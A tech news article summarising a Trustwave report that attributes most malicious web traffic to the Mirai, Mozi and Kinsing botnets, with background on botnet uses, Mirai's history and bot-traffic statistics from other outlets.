Almost all malicious traffic that happens on the wider internet is coming from botnets, a new research report published by cybersecurity researchers from Trustwave has claimed.
In their report, Trustwave’s experts wrote that after analyzing “vast amounts” of data from more than 38,000 unique IP addresses, and after obtaining 1,100 unique payloads served in attacks, they found that almost 19% of all recorded web traffic was malicious.
Botnets were responsible for more than 95% of all the malicious traffic that was recorded in the time period. The analysis was done over a six-month period that ended in May this year.
While there are probably dozens, if not hundreds, of different botnets, only a handful stood out as the most active ones. Mirai, Mozi, and Kinsing botnets made up almost all (95%) of the recorded exploit attempts that were run over either HTTP, or HTTPS protocols. These malware families, the researchers further explained, are the most widespread and their main objective is to exploit vulnerabilities in Internet of Things (IoT) devices in order to compromise them and assimilate them into the botnet.
The botnets utilize web shells as they try to exploit vulnerabilities in specific enterprise applications, the researchers concluded. These flaws would give them access to target endpoints, which grants them the ability to conduct further malicious actions. To stay safe, businesses must prioritize “robust security measures”, the researchers argue, which includes regularly applying patches, implementing strong access controls, assessing network security frequently, and keeping an eye on network traffic for anything suspicious.
Analysis: Why does it matter?
Businesses, regardless of their size, location, or industry, have always been an attractive target for cybercriminals. Botnets are one of the most potent weapons in their arsenal, and understanding the threat, how the attackers operate and what their goals are, can help businesses prepare their defenses better and repel future, potentially harmful, attacks.
Botnets, on the other hand, are the staple of every serious threat actor’s operation. They can be used for a wide variety of malicious activity, from Distributed Denial of Service (DDoS) attacks, to cryptocurrency mining, to credentials theft and sensitive data exfiltration. By having access to thousands of internet-connected devices, from computers, laptops, and servers, to smart home appliances, smart meters, and various office equipment, threat actors can send enormous amounts of traffic towards a single entity, clogging the traffic and essentially rendering the service inaccessible.
They can also install cryptominers, also known as cryptojackers, to compromised devices. These malware, of which XMRig is by far the most popular one, “mine” cryptocurrencies by using the device’s computing power, electrical power, and internet bandwidth, and send them to the attackers’ addresses, effectively making profit. The victims are left with unusable computers and an inflated energy bill.
One of the most popular botnets out there is Mirai. First discovered by cybersecurity researchers from FortiGuard back in 2016. Mirai has since grown into a true botnet powerhouse. In its 2022 analysis, HowToGeek said Mirai counted more than 500,000 devices in its botnet. This malware usually targets Linux-powered devices, which mostly means IoT endpoints.
A year after its discovery, in 2017, law enforcement agencies arrested two individuals, who later pleaded guilty for developing and using Mirai. These two were Paras Jha from Fanwood, N.J., who was 21 at the time, and Josiah White, from Washington, Pennsylvania, who was 20 at the time. Despite the arrests, and due to the fact that Mirai’s code survived, other threat actors soon adopted it, which is why Mirai is a formidable threat, even today.
What have others said about bot traffic?
In SC Media’s recent report, it was said that the proportion of human traffic has increased to its lowest level in eight years - a “worrying trend with no signs of stopping.” However, the same report also states that not all bot traffic is bad, as many bots are actually malicious and allow for the internet to function in the way most people are used to, these days.
Still, over the course of the last 12 months, malicious bots became significantly more sophisticated, especially with the introduction of novel tools such as generative AI. “The more sophisticated these bots become, the more difficult they are to stop,” the report states, adding that businesses must act quickly and defend their premises properly. “As bot activity closes in on 50% of all internet traffic, security teams must make mitigating the potential impact of those bots a high priority. Those who fail to act are putting themselves, their customers, and their reputations at risk.”
German outlet B2B Cyber Security says this country has it particularly bad, as last year almost two-thirds of all internet traffic in the country - 68.6% - came from bots, up significantly from the year before (39.6%). Citing analysis from cybersecurity researchers Imperva, the publication says the bot traffic percentage was offset by the proportion of traffic generated by human users at 25.2%, down by a lot compared to 2021 (57.4%).
Go deeper
If you want to read up on the latest for Mirai, make sure to check out this report. Also, if you’re interested in learning more about Distributed Denial of Service attacks and how to stay safe, read this. Here’s our in-depth guide on the best malware removal tools and the best antivirus programs out there.
- Check out our list of the best firewalls right now